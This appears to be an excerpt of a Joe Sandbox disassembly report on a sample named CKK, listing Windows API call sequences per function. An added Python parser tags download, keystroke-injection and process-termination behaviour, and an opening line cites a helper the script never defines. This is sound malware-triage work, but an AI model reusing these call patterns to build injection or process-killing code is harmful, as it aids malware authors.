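`functions_calling(parse_records(report_text), "HttpSendRequestW")` returns the records whose own call sequence (sub-calls excluded) uses that import; the Opcode ID and API String ID of a hit are the values to search for in other reports, since the Uniqueness Score is -1.00% throughout this report and carries no information.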

                                          APIs
                                          • GetModuleHandleW.KERNEL32 ref: 00EA98BC
                                          • LoadStringW.USER32(00000000,?,00E83AAF,?), ref: 00EA98C3
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • MessageBoxW.USER32 ref: 00EA9987
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 858772685-4153970271
                                          • Opcode ID: d3ba866c33aec441cb43705e14ce2e790514772ad6e8c0f1ab1bcb98205c5db6
                                          • Instruction ID: 2576b4bc77724f5333dc225012532664db0eb139bac5c52413cf6227ebac7a06
                                          • Opcode Fuzzy Hash: d3ba866c33aec441cb43705e14ce2e790514772ad6e8c0f1ab1bcb98205c5db6
                                          • Instruction Fuzzy Hash: 90216F3290021AABDF15EF90DC0AEEE77B5FF18300F045466F515760A2DA31A628EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetParent.USER32 ref: 00EA20AB
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00EA20C0
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EA214D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1290815626-3381328864
                                          • Opcode ID: 1abe62878f475493a2e02de6b2e0fdfc191c28f6f7b68ae1485886910dec67d7
                                          • Instruction ID: 36a9a6f159d9abd93355379aa3cdaef99d2f7e2064395906c36239dd5401f912
                                          • Opcode Fuzzy Hash: 1abe62878f475493a2e02de6b2e0fdfc191c28f6f7b68ae1485886910dec67d7
                                          • Instruction Fuzzy Hash: 2C11EBB66C570779FA012224AC06DE737DCCB1A754B20211AF704B90D1FAA1B8416915
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 1282221369-0
                                          • Opcode ID: 2d3d047d4e0bd857cfe947ba9c344789368f48dcec5a3a3c97b96a62ef52c38a
                                          • Instruction ID: f3aa07bc893811c36776752ab7f8dbffbb93a8711fb6d340c72557a0443d79de
                                          • Opcode Fuzzy Hash: 2d3d047d4e0bd857cfe947ba9c344789368f48dcec5a3a3c97b96a62ef52c38a
                                          • Instruction Fuzzy Hash: 36616C71A043046FDB29AFB4AC41AAD7BE9EF05314F24E16EFA4CB7281DB319D418750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00ED5186
                                          • ShowWindow.USER32(?,00000000), ref: 00ED51C7
                                          • ShowWindow.USER32(?,00000005), ref: 00ED51CD
                                          • SetFocus.USER32 ref: 00ED51D1
                                            • Part of subcall function 00ED6FBA: DeleteObject.GDI32(00000000), ref: 00ED6FE6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED520D
                                          • SetWindowLongW.USER32 ref: 00ED521A
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00ED524D
                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00ED5287
                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00ED5296
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                          • String ID:
                                          • API String ID: 3210457359-0
                                          • Opcode ID: 5ee5f043e640fff9802f63288cd71322b959af5090fe02bc63ef3fc48bba9302
                                          • Instruction ID: bb6c7b596e60c810477dbd800c52b5380bac80f325720869d2a81d0a01467c1d
                                          • Opcode Fuzzy Hash: 5ee5f043e640fff9802f63288cd71322b959af5090fe02bc63ef3fc48bba9302
                                          • Instruction Fuzzy Hash: 7F51B032A42A09FEEF209F24CC45BD83BB5EB05365F146013FA24B63E1C371998ADB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadImageW.USER32 ref: 00E96890
                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E968A9
                                          • LoadImageW.USER32 ref: 00E968B9
                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E968D1
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E968F2
                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E58874,00000000,00000000,00000000,000000FF,00000000), ref: 00E96901
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E9691E
                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E58874,00000000,00000000,00000000,000000FF,00000000), ref: 00E9692D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                          • String ID:
                                          • API String ID: 1268354404-0
                                          • Opcode ID: ebe2255d40106ef29fda36e1941c4b52d65deadb87561bf40e69b4366d6419ba
                                          • Instruction ID: fe58c51601bd8a988c1cebdfa159795454045e249f7d7e831ea8421b01a003fc
                                          • Opcode Fuzzy Hash: ebe2255d40106ef29fda36e1941c4b52d65deadb87561bf40e69b4366d6419ba
                                          • Instruction Fuzzy Hash: BC519774600209EFDF208F25CC51BAA3BB9FB88765F105919F952B72A0DB70E984DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EBC182
                                          • GetLastError.KERNEL32 ref: 00EBC195
                                          • SetEvent.KERNEL32 ref: 00EBC1A9
                                            • Part of subcall function 00EBC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EBC272
                                            • Part of subcall function 00EBC253: GetLastError.KERNEL32 ref: 00EBC322
                                            • Part of subcall function 00EBC253: SetEvent.KERNEL32 ref: 00EBC336
                                            • Part of subcall function 00EBC253: InternetCloseHandle.WININET(00000000), ref: 00EBC341
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 337547030-0
                                          • Opcode ID: 3959f465c13e919dbf8e7c1975526f0207ae7eadfb636f95af5326793091074b
                                          • Instruction ID: e862237edf43b0c3de7e9b45e75631de607145237dcfd871e1dd27a5ea4e5cb0
                                          • Opcode Fuzzy Hash: 3959f465c13e919dbf8e7c1975526f0207ae7eadfb636f95af5326793091074b
                                          • Instruction Fuzzy Hash: B231AE71205A01EFDB219FB6ED04AA7BBF9FF58344B20541EF956E6620D730E814DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA3A57
                                            • Part of subcall function 00EA3A3D: GetCurrentThreadId.KERNEL32 ref: 00EA3A5E
                                            • Part of subcall function 00EA3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA3A65
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EA25BD
                                          • PostMessageW.USER32 ref: 00EA25DB
                                          • Sleep.KERNEL32(00000000), ref: 00EA25DF
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EA25E9
                                          • PostMessageW.USER32 ref: 00EA2601
                                          • Sleep.KERNEL32(00000000), ref: 00EA2605
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EA260F
                                          • PostMessageW.USER32 ref: 00EA2623
                                          • Sleep.KERNEL32(00000000), ref: 00EA2627
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: 2bf182d6245bb70e03e6ce09ed133e6146626363897b8b7c47a716743d6f2550
                                          • Instruction ID: d26dba73aca0b683351b03458e48d0f21d3b053076758dd1a06d3f1ffeb78840
                                          • Opcode Fuzzy Hash: 2bf182d6245bb70e03e6ce09ed133e6146626363897b8b7c47a716743d6f2550
                                          • Instruction Fuzzy Hash: E101D830791320BBFB1067699C8AF597F99DB4EB51F201006F314BF0D1C9E16444CA6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcessHeap.KERNEL32 ref: 00EA180C
                                          • HeapAlloc.KERNEL32(00000000,?,00EA1449,?,?,00000000), ref: 00EA1813
                                          • GetCurrentProcess.KERNEL32 ref: 00EA1828
                                          • GetCurrentProcess.KERNEL32 ref: 00EA1830
                                          • DuplicateHandle.KERNEL32(00000000,?,00EA1449,?,?,00000000), ref: 00EA1833
                                          • GetCurrentProcess.KERNEL32 ref: 00EA1843
                                          • GetCurrentProcess.KERNEL32 ref: 00EA184B
                                          • DuplicateHandle.KERNEL32(00000000,?,00EA1449,?,?,00000000), ref: 00EA184E
                                          • CreateThread.KERNEL32(00000000,00000000,00EA1874,00000000,00000000,00000000), ref: 00EA1868
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 2ec8ea440af999fb76cddd360519d0aa03b6c25d66d9180e63d94c5733206564
                                          • Instruction ID: 5a47dc6ecb0c89f957f1d9940f7adec5a6182c998889f851c2630b9f5472a180
                                          • Opcode Fuzzy Hash: 2ec8ea440af999fb76cddd360519d0aa03b6c25d66d9180e63d94c5733206564
                                          • Instruction Fuzzy Hash: B701C275241315BFE710AF75EC4DF573B6CEB89B51F104451FA05EB192C6749804CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EAD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00EAD501
                                            • Part of subcall function 00EAD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00EAD50F
                                            • Part of subcall function 00EAD4DC: CloseHandle.KERNEL32(00000000), ref: 00EAD5DC
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECA16D
                                          • GetLastError.KERNEL32 ref: 00ECA180
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECA1B3
                                          • TerminateProcess.KERNEL32 ref: 00ECA268
                                          • GetLastError.KERNEL32 ref: 00ECA273
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECA2C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 38234d12fe0da88c22838343ac9e8352caab7bd98066251dc2faab371a039c30
                                          • Instruction ID: 876f00ea9c28dfab003b570519960227b1103a7c5e199e1af2a7d974ad0b3f20
                                          • Opcode Fuzzy Hash: 38234d12fe0da88c22838343ac9e8352caab7bd98066251dc2faab371a039c30
                                          • Instruction Fuzzy Hash: E261CE702092529FD724DF14D594F16BBE1AF4430CF18949CE466ABBA3C776EC4ACB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%
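The API tables above are raw per-function import lists, and three of them are worth reading as behaviour rather than as imports: the WinINet connect/open-URL function (calls at ref 00EBC182 and its subcall 00EBC253), the function that attaches to another thread's input queue and posts virtual-key messages (ref 00EA25BD, with AttachThreadInput in subcall 00EA3A3D), and the function that walks the process list with Toolhelp32, opens a process with access mask 00000001 and calls TerminateProcess, whose String ID is SeDebugPrivilege (ref 00ECA16D). The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a small parser for records in this format plus a rule set that turns those three call sequences into tags, so the same check can be run over an exported report instead of reading every table by hand. The sample input is a constructed copy of those records; the tag names and rules are this example's own assumptions. Two constants are from the Windows SDK: an OpenProcess access mask of 0x0001 is PROCESS_TERMINATE, and MapVirtualKeyW's first argument 0x25 is VK_LEFT. Where Joe prints "?" for an argument it could not resolve, the rules treat the value as unknown rather than guessing.

```python
import re

# Constructed sample input: three of the function records shown above, copied in the
# shape Joe Sandbox prints them (bullets, "Part of subcall function", "ref:" addresses).
SAMPLE = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EBC182
  • Part of subcall function 00EBC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EBC272
  • Part of subcall function 00EBC253: InternetCloseHandle.WININET(00000000), ref: 00EBC341
• String ID:
APIs
  • Part of subcall function 00EA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA3A57
  • Part of subcall function 00EA3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA3A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00EA25BD
• PostMessageW.USER32 ref: 00EA25DB
• String ID:
APIs
  • Part of subcall function 00EAD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00EAD501
  • Part of subcall function 00EAD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00EAD50F
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECA16D
• TerminateProcess.KERNEL32 ref: 00ECA268
• String ID: SeDebugPrivilege
"""

# One bullet line: optional "Part of subcall function X:", then Api.MODULE(args), ref: ADDR.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STRING_RE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)")
PROCESS_TERMINATE = 0x0001  # Windows SDK: OpenProcess dwDesiredAccess bit

def parse_records(text):
    """Split the dump at each 'APIs' header; collect that function's calls and String IDs."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"calls": [], "strings": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.search(s)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur["calls"].append({"api": m.group("api"), "module": m.group("mod"),
                                 "args": args, "ref": m.group("ref"), "subcall": m.group("sub")})
            continue
        m = STRING_RE.match(s)
        if m:  # Joe joins several strings with '$'
            cur["strings"] = [x for x in m.group("ids").split("$") if x]
    return records

def arg_int(call, i):
    """Argument i as an int; None when Joe printed '?' (value unknown at analysis time)."""
    try:
        return int(call["args"][i], 16)
    except (IndexError, ValueError):
        return None

def classify(rec):
    """Behaviour tags for one record with the evidence that triggered them (assumed rule set)."""
    names = {c["api"] for c in rec["calls"]}
    tags = []
    opens = [c for c in rec["calls"] if c["api"] == "OpenProcess"]
    if "TerminateProcess" in names and opens:
        access = [arg_int(c, 0) for c in opens]
        ev = "OpenProcess access=" + ",".join(hex(a) for a in access if a is not None)
        if access and all(a == PROCESS_TERMINATE for a in access):
            ev += " (PROCESS_TERMINATE only)"
        if "CreateToolhelp32Snapshot" in names:
            ev += "; enumerates via Toolhelp32"
        if "SeDebugPrivilege" in rec["strings"]:
            ev += "; references SeDebugPrivilege"
        tags.append(("process_kill", ev))
    if "AttachThreadInput" in names and {"PostMessageW", "SendMessageW"} & names:
        keys = [arg_int(c, 0) for c in rec["calls"] if c["api"] == "MapVirtualKeyW"]
        ev = "attaches to target thread input; vk=" + ",".join(hex(k) for k in keys if k is not None)
        tags.append(("keystroke_injection", ev))
    wininet = [c["api"] for c in rec["calls"] if c["module"] == "WININET"]
    if wininet:
        tags.append(("wininet_download", "+".join(wininet)))
    return tags

def scan(text):
    """Tags per record, keyed by the ref of the record's first direct (non-subcall) call."""
    out = []
    for rec in parse_records(text):
        if not rec["calls"]:
            continue
        direct = [c for c in rec["calls"] if not c["subcall"]]
        out.append(((direct or rec["calls"])[0]["ref"], classify(rec)))
    return out

if __name__ == "__main__":
    for ref, tags in scan(SAMPLE):
        print(ref, tags)
```

The subcall lines matter: the record at ref 00EA25BD would look like harmless key mapping without the AttachThreadInput call that Joe lists under subcall 00EA3A3D, and the Toolhelp32 enumeration for ref 00ECA16D lives in subcall 00EAD4DC, so the parser keeps subcall entries in the same record and only uses the direct/subcall distinction to pick a stable key.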

                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00ED3925
                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00ED393A
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00ED3954
                                          • _wcslen.LIBCMT ref: 00ED3999
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00ED39C6
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00ED39F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcslen
                                          • String ID: SysListView32
                                          • API String ID: 2147712094-78025650
                                          • Opcode ID: a5b90bddc5862a55a98c2f60c341889b455a1e93a94775dccbce30ad43ae9b4b
                                          • Instruction ID: cbda60ec0352c8dd25d9804208f83e348b2564014b7e3bd19de0612e0f19ebc8
                                          • Opcode Fuzzy Hash: a5b90bddc5862a55a98c2f60c341889b455a1e93a94775dccbce30ad43ae9b4b
                                          • Instruction Fuzzy Hash: 4D41FC31A00209ABEB219F64CC49BEA7BA9EF08354F101127F958F72C1D7B0DA81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00E62D4B
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00E62D53
                                          • _ValidateLocalCookies.LIBCMT ref: 00E62DE1
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00E62E0C
                                          • _ValidateLocalCookies.LIBCMT ref: 00E62E61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: &H$csm
                                          • API String ID: 1170836740-1242228090
                                          • Opcode ID: 66d71331d893b4d8ee2ba6df2acec8571e79f0ea7eb553902d293bc957e5a528
                                          • Instruction ID: 1ac4f54686859ad85031b06dc361493fa17f75f03032c07ef95acec7e4abd6b5
                                          • Opcode Fuzzy Hash: 66d71331d893b4d8ee2ba6df2acec8571e79f0ea7eb553902d293bc957e5a528
                                          • Instruction Fuzzy Hash: D941F634A406099BCF10DF68E844ADEBBF4BF443A8F149159E914BB392D731DA05CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 094124fdfe9f04892ff9cba257cda3e7bb0aa426aa9f818343b378e59b5fb3ca
                                          • Instruction ID: 4ecd18623a356dad3e42bb1eddddadae5736f8ae779830baa4d2839d826d3ead
                                          • Opcode Fuzzy Hash: 094124fdfe9f04892ff9cba257cda3e7bb0aa426aa9f818343b378e59b5fb3ca
                                          • Instruction Fuzzy Hash: 70112B35689307BEE7055B54AC82CEB67DCDF5A358B30102FF504FA2C2EBA4BD006265
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$LocalTime
                                          • String ID:
                                          • API String ID: 952045576-0
                                          • Opcode ID: 1ee220d49d26e52248a42dcb4c3b732b82efe94fddd8a11d0054d4f20bf9d5f1
                                          • Instruction ID: 9643025c03bf2f63c07f79b96ff80355545f462ffe9133af136c9f9b9d56b249
                                          • Opcode Fuzzy Hash: 1ee220d49d26e52248a42dcb4c3b732b82efe94fddd8a11d0054d4f20bf9d5f1
                                          • Instruction Fuzzy Hash: F041BE65C5021876DB11EBB49C8A9CFB3ECAF46340F50A462E518F3262FB34E245C3A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
